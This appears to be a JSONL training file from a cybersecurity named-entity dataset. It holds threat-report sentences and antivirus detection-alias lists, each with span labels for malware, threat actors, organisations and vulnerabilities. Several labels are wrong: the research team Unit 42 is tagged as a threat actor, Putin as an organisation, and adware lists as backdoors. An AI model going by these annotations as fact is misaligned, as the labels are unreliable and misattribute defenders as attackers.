{"text": "Package Name App Name com.whatsapp WhatsApp Messenger com.pugna.magiccall n/a org.telegram.messenger Telegram com.facebook.katana Facebook com.twitter.android Twitter jp.naver.line.android LINE : Free Calls & Messages com.instanza.cocovoice Coco com.beetalk BeeTalk com.gtomato.talkbox TalkBox Voice Messenger - PTT com.viber.voip Viber Messenger com.immomo.momo MOMO陌陌 com.facebook.orca Messenger – Text and Video Chat for Free com.skype.rover Skype ; 3rd party stores only Most of these apps are well established and available on Google Play , however , com.skype.rover appears to be available only on third-party app stores .", "spans": {"SYSTEM: WhatsApp": [[35, 43]], "SYSTEM: Messenger": [[44, 53], [300, 309], [337, 346], [388, 397]], "SYSTEM: Telegram": [[101, 109]], "SYSTEM: Facebook": [[130, 138]], "SYSTEM: Twitter": [[159, 166]], "SYSTEM: LINE": [[189, 193]], "SYSTEM: BeeTalk": [[258, 265]], "SYSTEM: TalkBox": [[286, 293]], "SYSTEM: Viber": [[331, 336]], "SYSTEM: MOMO陌陌": [[363, 369]], "SYSTEM: Skype": [[445, 450]], "SYSTEM: Google Play": [[532, 543]]}, "info": {"id": "cyner2_train_003720", "source": "cyner2_train"}}
{"text": "The spear-phishing campaigns we detected use links to RAR-compressed executables and Microsoft Word attachments that exploit the CVE-2012-0158 vulnerability.", "spans": {"THREAT_ACTOR: spear-phishing campaigns": [[4, 28]], "MALWARE: exploit": [[117, 124]], "VULNERABILITY: vulnerability.": [[143, 157]]}, "info": {"id": "cyner2_train_003721", "source": "cyner2_train"}}
{"text": "FireEye Labs recently identified a previously unobserved version of Ploutus, dubbed Ploutus-D, that interacts with KAL's Kalignite multivendor ATM platform.", "spans": {"ORGANIZATION: FireEye Labs": [[0, 12]], "MALWARE: Ploutus,": [[68, 76]], "MALWARE: Ploutus-D,": [[84, 94]], "ORGANIZATION: KAL's": [[115, 120]], "SYSTEM: Kalignite multivendor ATM platform.": [[121, 156]]}, "info": {"id": "cyner2_train_003723", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.6E79 Application.Bundler.InstallBrain.A Application.Bundler.InstallBrain.A Win32.Adware.InstallBrain.d Win.Adware.Installbrain-35 Win32.Application.InstallBrain.B not-a-virus:AdWare.Win32.BrainInst.u Application.Bundler.InstallBrain.A Trojan.Win32.Adw.crasga Application.Bundler.InstallBrain.A Application.Win32.InstallBrain.BL Trojan:W32/InstallBrain.A Adware.Downware.1295 Adware.BrainInst.Win32.32 AdWare.Win32.InstallBrain AdWare/BrainInst.dz W32.Adware.Installbrain GrayWare[AdWare:not-a-virus]/Win32.BrainInst.u TrojanDownloader:Win32/Brantall.B PUP.InstallBrain/Variant not-a-virus:AdWare.Win32.BrainInst.u AdWare.BrainInst PUP.Optional.InstallBrain Win32.Adware.Braininst.Wvas Adware.BrainInst!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003725", "source": "cyner2_train"}}
{"text": "Interestingly, as part of the delivery mechanism, the malware is disguised as a base64 digital certificate and decoded via certutil.exe.", "spans": {"MALWARE: malware": [[54, 61]]}, "info": {"id": "cyner2_train_003730", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Backdoor.Zegost.B.5 Trojan/Redosdru.aw Backdoor.Bapkri TrojWare.Win32.GameThief.Magania.~NWABI Dialer.Bjlog Backdoor.Win32.Zegost!IK Backdoor/Win32.Bapkri Backdoor.Win32.Drwolf.fep Backdoor.Win32.Zegost W32/Bjlog.SMC!tr PSW.OnlineGames3.WQF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003731", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Banload.bppx Trojan.Win32.A.Downloader.279193 Trojan.Qhost.3874 Downloader.Banload.Win32.43263 Trojan[Downloader]/Win32.Banload Trojan-Downloader.Win32.Banload.bppx TrojanDownloader:Win32/Servi.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003732", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Kryptik.qb Trojan:Win32/Sopinar.D SScope.Malware-Cryptor.Drixed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003734", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.FakeGom.13314 Backdoor.Miancha.r5 Backdoor.Miancha! W32/Backdoor2.HTKG Backdoor.Miancha TROJ_DROPPR.YZ Backdoor.Win32.Miancha.b Trojan.Win32.Miancha.dxrsks Backdoor.W32.Miancha.b!c Win32.Backdoor.Miancha.Jcq Backdoor:W32/Miancha.A BackDoor.Miancha.1 Backdoor.Miancha.Win32.4 TROJ_DROPPR.YZ W32/Backdoor.IZWZ-3837 Backdoor/Miancha.a TR/Miancha.A.1 Trojan:Win32/Miancha.A Backdoor.Miancha Backdoor.Win32.Miancha Backdoor.Win32.Miancha.b Win32/Backdoor.3e8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003735", "source": "cyner2_train"}}
{"text": "To evade detection, this app was concealed as a legitimate app.", "spans": {}, "info": {"id": "cyner2_train_003736", "source": "cyner2_train"}}
{"text": "In recent months, Unit 42 has observed a number of attacks that we attribute to this group.", "spans": {"THREAT_ACTOR: Unit 42": [[18, 25]], "ORGANIZATION: group.": [[85, 91]]}, "info": {"id": "cyner2_train_003737", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.System3YM.Worm Worm.Win32.AutoRun!O Worm.Tupym.A5 W32/Tupym.worm Worm.AutoRun.FLD Worm.Autorun.Win32.63738 Trojan.Heur.AutoIT.2 Win32.Trojan.WisdomEyes.16070401.9500.9892 W32.Svich Win32/Yahlover.PT WORM_SOHAND.SM Win.Worm.Autorun-313 Worm.Win32.AutoRun.fnc Trojan.Script.Autorun.ddaffd W32.W.AutoRun.llU2 TrojWare.Win32.Injector.XEM Trojan.StartPage.31354 WORM_SOHAND.SM BehavesLike.Win32.Tupym.tz Worm.Win32.AutoRun Worm:Win32/Tupym.A Worm:Win32/Tupym.A Worm.Win32.AutoRun.fnc HEUR/Fakon.mwf Worm.Win32.Autorun.fnc Trojan.Autorun!VgV/xk+eV94 W32/AutoVt.AAAD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003738", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.G.Door.2.0 Backdoor/W32.Hupigon.495616.Q Backdoor.G.Door.2.0 Backdoor/G_Door.20 Backdoor.G.Door.2.0 Trojan.Win32.GDoor.dhmh W32/GDoor.HMGD-8120 Backdoor.Trojan Win32/G_Door.A BKDR_GLACIER.A Trojan.G_Door.E Backdoor.Win32.G_Door.83 Backdoor.G_Door!J6XAtZWeqBw Backdoor.Win32.G-Door_20.Svr[h] Backdoor.W32.G_Door.20!c Backdoor.G.Door.2.0 Backdoor.Win32.G_Door.A Backdoor.G.Door.2.0 BackDoor.GDoor.20 Backdoor.GDoor.Win32.23 BKDR_GLACIER.A BackDoor-FR.svr W32/GDoor.D TR/GDoor.Srv W32/Gdoor.F!tr.bdr Trojan[Backdoor]/Win32.G_Door Backdoor.G.Door.2.0 BackDoor-FR.svr Backdoor.G_Door Bck/G_Door.I Win32.Backdoor.G_door.Szbj Backdoor.Win32.G_Door Backdoor.G.Door.2.0 Backdoor.Win32.G_Door.83 Win32/Trojan.a6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003740", "source": "cyner2_train"}}
{"text": "Before we start dishing the details, there is going to be one main takeaway from this blog post: If you haven't already, update/patch your Adobe Flash now.", "spans": {"SYSTEM: Adobe Flash": [[139, 150]]}, "info": {"id": "cyner2_train_003741", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit/W97.CVE-2012-0158 Exp.OLE.CVE-2012-0158.E Win32.Exploit.CVE-2012-0158.l Doc.Exploit.CVE_2012_0158-17 Exploit.MSWord.CVE-2012-0158.de Exploit.ComObj.CVE-2012-0158.hzuf Exploit.WORD.CVE-2012-0158.A EXPL_MSCOMCTL.A Trojan.EKOP-3 EXP/CVE-2012-0158.hgyuv Trojan[Exploit]/MSWord.CVE-2012-0158.de Exploit.MSWord.CVE-2012-0158.de Exploit.CVE-2012-0158 MSWord/Toolbar.A!exploit virus.exp.20120158", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003743", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Banito.AQ Backdoor.Banito.ae.n3 Backdoor/Banito.aq Backdoor.Banito!msfCf/FWzGs W32/Banito.AI BKDR_BANITO.BE Backdoor.Win32.Banito.bt Backdoor.Banito.AQ Backdoor.Win32.Banito Backdoor.Banito.AQ BackDoor.Faggoty BKDR_BANITO.BE Backdoor.Win32.Banito!IK Backdoor/Banito.ao Backdoor:Win32/Banito.D Backdoor.Win32.Banito.54784.F[UPX] Backdoor.Banito.AQ Win-Trojan/Banito.54784.D OScope.Backdoor.Banito.1 Backdoor.Win32.Banito W32/Banito.AJ!tr.bdr Bck/Banito.AT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003744", "source": "cyner2_train"}}
{"text": "W32/NionSpy is a family of malware that steals information from infected machines and replicates to new machines over networks and removable thumb drives.", "spans": {"MALWARE: malware": [[27, 34]], "SYSTEM: machines": [[73, 81], [104, 112]], "SYSTEM: removable thumb drives.": [[131, 154]]}, "info": {"id": "cyner2_train_003745", "source": "cyner2_train"}}
{"text": "Domain names registered by the Fancy Bear actor", "spans": {"THREAT_ACTOR: the Fancy Bear actor": [[27, 47]]}, "info": {"id": "cyner2_train_003746", "source": "cyner2_train"}}
{"text": "Early in March, while studying the ChinaZ threat, it became readily apparent that default passwords were being used for more than just a supplementary attack vector.", "spans": {"THREAT_ACTOR: ChinaZ threat,": [[35, 49]]}, "info": {"id": "cyner2_train_003747", "source": "cyner2_train"}}
{"text": "The vulnerability does not enable the execution of arbitrary code but the exploit was able to inject a JavaScript payload into the local file context.", "spans": {"VULNERABILITY: vulnerability": [[4, 17]], "VULNERABILITY: arbitrary code": [[51, 65]], "MALWARE: exploit": [[74, 81]], "VULNERABILITY: JavaScript": [[103, 113]], "MALWARE: payload": [[114, 121]]}, "info": {"id": "cyner2_train_003748", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Multi.Moridin!O W32.Moridin.B PE_MORIDIN.A Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Morodi.A PE_MORIDIN.A Win.Trojan.Morid-5 Virus.Multi.Moridin.b Win32.Moridin.A Virus.Multi.Moridin!c Heur.Packed.Unknown Win32.Moridin Virus.Moridin.Win32.2 BehavesLike.Win32.Ipamor.cm W32/Trojan.BIOB-8512 TR/Moridin.B.2 Win32.Multi.b.106496 Trojan.Heur.FU.EB24AD Virus.Multi.Moridin.b Virus.Multi.Moridin W32/Moridin.72192 Win32.Virus.Moridin.Dzkb IRC.Moridin.B Trojan-Dropper.Win32.Loring W32/Moridin.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003749", "source": "cyner2_train"}}
{"text": "Multiple versions of Regin were found in the wild, targeting several corporations, institutions, academics, and individuals.", "spans": {"MALWARE: Regin": [[21, 26]], "ORGANIZATION: corporations, institutions, academics,": [[69, 107]], "ORGANIZATION: individuals.": [[112, 124]]}, "info": {"id": "cyner2_train_003750", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod90c.Trojan.0a13 Trojan.BHO.ODS Trojan-Clicker/W32.BHO.20480.L TrojanDropper.Nonaco Trojan.BHO Riskware.Win32.E404.fyxw W32/Downldr2.HQQK Win32/Puper.RK Trojan.BHO.ODS Adware.BHO!Ut7EPOdXbSM Adware.E404.20480.B Trojan.BHO.ODS Trojan.BHO.ODS Trojan.Popuper.43732 Spyware[AdWare:not-a-virus]/Win32.BHO TrojanDropper:Win32/Nonaco.C Trojan.BHO.ODS W32/Downloader.GJMR-1771 Trojan.Win32.Dbg AdWare.Win32.BHO.aNN Win32/BHO.NHP not-a-virus:AdWare.Win32.E404", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003752", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.RazyNHmA.Trojan Win32.Trojan.Kryptik.ayq TSPY_HPZBOT.SM1 TrojWare.Win32.DorkBot.LB TSPY_HPZBOT.SM1 BehavesLike.Win32.RansomTescrypt.ch Trojan.Win32.Crypt TR/Crypt.Xpack.itdny Trojan.Symmi.D1129F Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003753", "source": "cyner2_train"}}
{"text": "Based on our research that we will further outline below, attackers behind the outages in two power facilities in Ukraine in December likely attempted similar attacks against a mining company and a large railway operator in Ukraine.", "spans": {"THREAT_ACTOR: attackers": [[58, 67]], "ORGANIZATION: power facilities": [[94, 110]], "ORGANIZATION: mining company": [[177, 191]], "ORGANIZATION: railway operator": [[204, 220]]}, "info": {"id": "cyner2_train_003754", "source": "cyner2_train"}}
{"text": "The group behind these attacks is known as Dragonfly.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "THREAT_ACTOR: Dragonfly.": [[43, 53]]}, "info": {"id": "cyner2_train_003755", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.iStartSurf.1 Application.iStartSurf.1 Win32.Trojan.WisdomEyes.16070401.9500.9915 NSIS/TrojanDownloader.Adload.AQ not-a-virus:HEUR:AdWare.Win32.AdLoad.heur Application.iStartSurf.1 Riskware.Nsis.Adload.dtchzc Adware.W32.Adload!c Trojan.Vittalia.1482 BehavesLike.Win32.AdwareAdload.tc TR/Dldr.Adload.1839597.7 TrojanDownloader:Win32/Quireap.A not-a-virus:HEUR:AdWare.Win32.AdLoad.heur PUP/Win32.Adload.R155445 Trj/CI.A NSIS.Adware.Adload.V", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003756", "source": "cyner2_train"}}
{"text": "We have seen multiple Elirks variants using Japanese blog services for the last couple of years.", "spans": {"MALWARE: Elirks variants": [[22, 37]]}, "info": {"id": "cyner2_train_003757", "source": "cyner2_train"}}
{"text": "Symantec telemetry revealed an exploit hosted on the compromised site, which was used to infect visitors with the Korplug back door detected by Symantec as Backdoor.Korplug.", "spans": {"ORGANIZATION: Symantec": [[0, 8], [144, 152]], "SYSTEM: telemetry": [[9, 18]], "MALWARE: exploit": [[31, 38]], "VULNERABILITY: compromised": [[53, 64]], "MALWARE: the Korplug back door": [[110, 131]]}, "info": {"id": "cyner2_train_003760", "source": "cyner2_train"}}
{"text": "This campaign uses obfuscated variants of the HTTPBrowser tool that use DNS as a control channel.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "MALWARE: HTTPBrowser tool": [[46, 62]]}, "info": {"id": "cyner2_train_003761", "source": "cyner2_train"}}
{"text": "STRONTIUM has been active since at least 2007.", "spans": {"THREAT_ACTOR: STRONTIUM": [[0, 9]]}, "info": {"id": "cyner2_train_003763", "source": "cyner2_train"}}
{"text": "Check Point informed the Google Security team about the apps, which were then removed from Google Play.", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google Security team": [[25, 45]], "SYSTEM: apps,": [[56, 61]], "ORGANIZATION: Google Play.": [[91, 103]]}, "info": {"id": "cyner2_train_003765", "source": "cyner2_train"}}
{"text": "Finally, this variant also contains an interesting piece of comment by the malware author written in the macro code, which made us feel obliged to take a closer look in the first place.", "spans": {}, "info": {"id": "cyner2_train_003766", "source": "cyner2_train"}}
{"text": "APT groups from multiple countries - including China - have been known to target organizations of strategic interest with aggressive malware-based espionage campaigns.", "spans": {"THREAT_ACTOR: APT groups": [[0, 10]], "ORGANIZATION: organizations": [[81, 94]], "THREAT_ACTOR: malware-based espionage campaigns.": [[133, 167]]}, "info": {"id": "cyner2_train_003768", "source": "cyner2_train"}}
{"text": "Back then, MELANI already took appropriate action together with the affected financial institutions and ISPs in Switzerland to mitigate the threat.", "spans": {"ORGANIZATION: MELANI": [[11, 17]], "ORGANIZATION: financial institutions": [[77, 99]], "ORGANIZATION: ISPs": [[104, 108]]}, "info": {"id": "cyner2_train_003769", "source": "cyner2_train"}}
{"text": "Arsenal is currently developing a detailed case study related to our analysis of computers essential to the Odatv case in Turkey.", "spans": {"ORGANIZATION: Arsenal": [[0, 7]]}, "info": {"id": "cyner2_train_003771", "source": "cyner2_train"}}
{"text": "Another day, another ransomware gang.", "spans": {"THREAT_ACTOR: ransomware gang.": [[21, 37]]}, "info": {"id": "cyner2_train_003772", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9780 BehavesLike.Win32.StartPage.th Trojan-Dropper.Win32.Autoit Trojan.AutoIT.7 TrojanDropper.Autit Autoit.Trojan.Heur.Sxyf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003773", "source": "cyner2_train"}}
{"text": "This is the exact scenario we witnessed this week during an incident response procedure and that is detailed in this diary.", "spans": {}, "info": {"id": "cyner2_train_003774", "source": "cyner2_train"}}
{"text": "Buckeye also known as APT3, Gothic Panda, UPS Team, and TG-0110 is a cyberespionage group that is believed to have been operating for well over half a decade.", "spans": {"THREAT_ACTOR: Buckeye": [[0, 7]], "THREAT_ACTOR: APT3, Gothic Panda, UPS Team,": [[22, 51]], "THREAT_ACTOR: TG-0110": [[56, 63]], "THREAT_ACTOR: cyberespionage group": [[69, 89]]}, "info": {"id": "cyner2_train_003776", "source": "cyner2_train"}}
{"text": "Looking at the characteristics of the tool, we suspect that it has been prepared for the purpose of corporate espionage.", "spans": {"MALWARE: tool,": [[38, 43]], "THREAT_ACTOR: corporate espionage.": [[100, 120]]}, "info": {"id": "cyner2_train_003777", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoA.29F2 Backdoor.Win32.Poison!O TrojanDropper.VB BKDR_POISON.IRE Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/IRCBot.ACS BKDR_POISON.IRE Trojan-Dropper.Win32.VB.cwek Trojan.Win32.Poison.cqxwv Backdoor.Win32.Poison.146621 Backdoor.W32.Poison.bfjd!c Backdoor.Win32.Poison.fh Trojan.VbCrypt.68 Backdoor.Poison.Win32.31435 BehavesLike.Win32.Autorun.ch Backdoor/Poison.goa Trojan[Backdoor]/Win32.Poison Trojan-Dropper.Win32.VB.cwek Worm:Win32/Neubreku.C SIM.Trojan.VBO.02298 Bck/Poison.AK Win32.Trojan-dropper.Vb.Aenv Backdoor.Win32.Bifrose W32/VBInjector.W!tr Win32/Trojan.Dropper.b73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003778", "source": "cyner2_train"}}
{"text": "RATs, such as H-W0rm, njRAT, KilerRAT, DarkComet, Netwire, XtremeRAT, JSocket/AlienSpy/Adwind and others, hold special interest for the Threat Research Team at Fidelis Cybersecurity.", "spans": {"MALWARE: RATs,": [[0, 5]], "MALWARE: H-W0rm, njRAT, KilerRAT, DarkComet, Netwire, XtremeRAT, JSocket/AlienSpy/Adwind": [[14, 93]], "ORGANIZATION: the Threat Research Team": [[132, 156]], "ORGANIZATION: Fidelis Cybersecurity.": [[160, 182]]}, "info": {"id": "cyner2_train_003779", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.RootSmart.A Android.GGSmart.A Android.Malware.Trojan A.H.Rog.RootSmart.B Android.Trojan.GGSmart.d AndroidOS/GGSmart.A AndroidOS_RootSmart.D Android.Trojan.RootSmart.A HEUR:Backdoor.AndroidOS.RootSmart.a Android.Trojan.RootSmart.A Trojan.Android.RootSmart.bdbwsm Riskware.Android.FakeInstall.jab Trojan-Downloader:Android/RootSmart.A Android.Smart.4.origin AndroidOS_RootSmart.D AndroidOS/GGSmart.A Backdoor/AndroidOS.erl ANDROID/GGSmart.D.4 Trojan[Backdoor]/Android.RootSmart Android.Troj.GacBlocker.a.kcloud Android.Trojan.RootSmart.A HEUR:Backdoor.AndroidOS.RootSmart.a Android-Backdoor/RootSmart.1bb6 Android/GGSmart.D Trojan.AndroidOS.GGSmart Android/GGSmart.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003780", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.XML.CVE-2017-8570 W97M.Downloader Win32/Exploit.CVE-2017-8570.A TROJ_CVE20170199.JEJOPP Exploit.Xml.CVE-2017-0199.equmby PPT.S.Exploit.1356909 TROJ_CVE20170199.JEJOPP ZIP/Trojan.CGYR-2 XML/Dloader.S2 Exploit.CVE-2017-8570 MSOffice/Dloader!exploit.CVE20170199", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003781", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PasswordStealer Trojan.Win32.Ric.exqwlt Trojan.Win32.Z.Evrial.35328.F Trojan.MulDrop7.60168 Trojan.MSIL.PSW TrojanSpy:MSIL/Evrial.A!bit TScope.Trojan.MSIL Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003783", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Abuse-Worry/W32.NetPass.466944 Trojanspy.Vlogger.A3 Trojan/Spy.VB.nwb Trojan.Heur.RX.EB6D33 Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/VBInject.Stub Trojan.Win32.Diss.susqi Tool.NetPass.Win32.2684 Trojan[PSWTool]/Win32.NetPass PWS:Win32/Sifre.A Trojan.Win32.Diss.susqi Trojan/Win32.Sifre.R148157 Win32.Trojan.Diss.Lplb Riskware.PSWTool! Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003785", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit-CVE2012-0158.u Trojan.Mdropper TROJ_CVE20120158.MESD Exploit.Win32.CVE-2012-0158.aw Exploit.ComObj.CVE-2012-0158.hzuf Exploit.W32.Cve!c Exploit.Mht.1 TROJ_CVE20120158.MESD Trojan:Win32/Knonyme.CS!dha Exploit.WORD.CVE-2012-0158 Exploit.MSWord.CVE-2012-0158 Win32/Trojan.Exploit.a11", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003786", "source": "cyner2_train"}}
{"text": "As 2016 comes to a close, we observe the same thing happening to another of Nintendo's game properties: Super Mario.", "spans": {"ORGANIZATION: Nintendo's": [[76, 86]], "SYSTEM: game properties: Super Mario.": [[87, 116]]}, "info": {"id": "cyner2_train_003787", "source": "cyner2_train"}}
{"text": "According to SimilarWeb, these sites have a combined total of at least 50 million visitors per month.", "spans": {}, "info": {"id": "cyner2_train_003788", "source": "cyner2_train"}}
{"text": "These emails contain misleading links that download malicious Zip files, which, in turn, contain a JavaScript file that downloads the TorrentLocker ransomware.", "spans": {"MALWARE: TorrentLocker ransomware.": [[134, 159]]}, "info": {"id": "cyner2_train_003789", "source": "cyner2_train"}}
{"text": "Unit 42 has discovered a new cluster of malware samples, which targets Samsung devices and Korean language speakers, with relationships to the malware used in Operation Blockbuster.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: malware": [[40, 47]], "SYSTEM: Samsung devices": [[71, 86]], "ORGANIZATION: Korean language speakers,": [[91, 116]], "MALWARE: the malware": [[139, 150]], "THREAT_ACTOR: Operation Blockbuster.": [[159, 181]]}, "info": {"id": "cyner2_train_003791", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win.Trojan.Secrar-3 W32.W.Otwycal.l4av PUA.RiskWare.PEMalform Trojan:Win32/Secrar.A Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003792", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Scache.A Trojan.Scache.A Trojan.Scache.A Trojan.Scache.A Trojan.Dos.Scache.fnss TROJ_SCACHE.A Trojan.DOS.Scache Troj.DOS.Scache!c Trojan.Scache.A TrojWare.DOS.Scache Trojan.Scache.A Trojan.Cashe Trojan.Scache.DOS.2 TROJ_SCACHE.A TR/Scache.A W32/Scache.A!tr Trojan/DOS.Scache Trojan.Scache.A Dos.Trojan.Scache.Aguy Trojan.Scache.A Trojan.DOS.Scache.aa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003793", "source": "cyner2_train"}}
{"text": "One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS.", "spans": {"MALWARE: malware": [[34, 41]], "SYSTEM: SNS.": [[129, 133]]}, "info": {"id": "cyner2_train_003794", "source": "cyner2_train"}}
{"text": "This makes it a powerful tool for attackers.", "spans": {"THREAT_ACTOR: attackers.": [[34, 44]]}, "info": {"id": "cyner2_train_003795", "source": "cyner2_train"}}
{"text": "The calls are almost certainly a pro-Russia propaganda effort designed to create negative political content about those who have spoken out against Russian President Vladimir Putin and, in the last year, opposed Russia's invasion of Ukraine.", "spans": {"ORGANIZATION: Russian President Vladimir Putin": [[148, 180]]}, "info": {"id": "cyner2_train_003797", "source": "cyner2_train"}}
{"text": "While these attacks were covered extensively in the media, how the attackers stole these credentials and introduced W32.Disttrack on targeted organizations' networks remains a mystery.", "spans": {"THREAT_ACTOR: attackers": [[67, 76]], "ORGANIZATION: organizations' networks": [[142, 165]]}, "info": {"id": "cyner2_train_003798", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9990 W32.Sand.12300 Virus.Win32.HLLP.Alcaul.c Virus.Win32.HLLP.Alcaul.D Win32.HLLP.Alcopaul.12296 Win32.NGVCK.TTD Win32/HLLP.Alcaul.c W32/Alcaul.D Virus.Win32.HLLP.Alcaul.c Worm:Win32/Lopy.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003799", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Nioupale Trojan/Daserf.b Trojan.Heur.PT.E6A39B BKDR_DASERF.ZCEG-A Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_DASERF.ZCEG-A Trojan.Win32.Scar.hnib Trojan.Win32.Invader.ervtpc Troj.Dropper.W32.Small.kZ2V Trojan.Inject1.18880 BehavesLike.Win32.Backdoor.kh W32/Trojan.MWNM-9354 Trojan/Win32.Scar Backdoor:Win32/Nioupale.A Trojan.Win32.Scar.hnib Trojan/Win32.Scar.R68534 Trojan.Scar Win32.Trojan.Scar.Llhd W32/Scar.HNIB!tr Win32/Trojan.97a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003800", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MemScan:Backdoor.Hupigon.APH Win32.Backdoor.Hupigon.axbr.10 Backdoor.Graybird BKDR_HUPIGON.ASJ Backdoor.Win32.Hupigon.aha MemScan:Backdoor.Hupigon.APH MemScan:Backdoor.Hupigon.APH BackDoor.Pigeon.194 BKDR_HUPIGON.ASJ Backdoor.Win32.Hupigon!IK MemScan:Backdoor.Hupigon.APH Backdoor.Win32.Hupigon.cmpw Backdoor.Win32.Gpigeon2008.acj Backdoor.Win32.Hupigon BackDoor.Hupigon5.ARLC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003801", "source": "cyner2_train"}}
{"text": "A backdoor also known as: WS.Reputation.1 Trojan.Strictor.D148BF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003802", "source": "cyner2_train"}}
{"text": "It says those were sent in the report to the FBI.", "spans": {}, "info": {"id": "cyner2_train_003804", "source": "cyner2_train"}}
{"text": "The experts of G DATA's SecurityLabs analyzed a specially crafted Microsoft Word document the attackers used to install a rather famous banking Trojan called Dridex.", "spans": {"ORGANIZATION: G DATA's SecurityLabs": [[15, 36]], "SYSTEM: Microsoft Word document": [[66, 89]], "THREAT_ACTOR: attackers": [[94, 103]], "MALWARE: banking Trojan": [[136, 150]], "MALWARE: Dridex.": [[158, 165]]}, "info": {"id": "cyner2_train_003805", "source": "cyner2_train"}}
{"text": "Attackers, regardless of their skills and motives, often attempt to wrap malicious code in a way that will seem innocuous to practitioners and security products.", "spans": {"THREAT_ACTOR: Attackers,": [[0, 10]], "MALWARE: malicious code": [[73, 87]], "ORGANIZATION: practitioners": [[125, 138]], "SYSTEM: security products.": [[143, 161]]}, "info": {"id": "cyner2_train_003807", "source": "cyner2_train"}}
{"text": "The vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents.", "spans": {"VULNERABILITY: vulnerability bypassed": [[4, 26]], "ORGANIZATION: FireEye": [[82, 89]], "SYSTEM: network products": [[100, 116]]}, "info": {"id": "cyner2_train_003808", "source": "cyner2_train"}}
{"text": "This incident happened on an Android 6.0.1 device, owned by one of the company's Vice Presidents.", "spans": {"SYSTEM: Android 6.0.1 device,": [[29, 50]], "ORGANIZATION: the company's Vice Presidents.": [[67, 97]]}, "info": {"id": "cyner2_train_003809", "source": "cyner2_train"}}
{"text": "Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details.", "spans": {"ORGANIZATION: Morphisec researchers": [[0, 21]], "MALWARE: attacks": [[46, 53]]}, "info": {"id": "cyner2_train_003810", "source": "cyner2_train"}}
{"text": "This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site.", "spans": {"THREAT_ACTOR: attacker": [[15, 23]]}, "info": {"id": "cyner2_train_003811", "source": "cyner2_train"}}
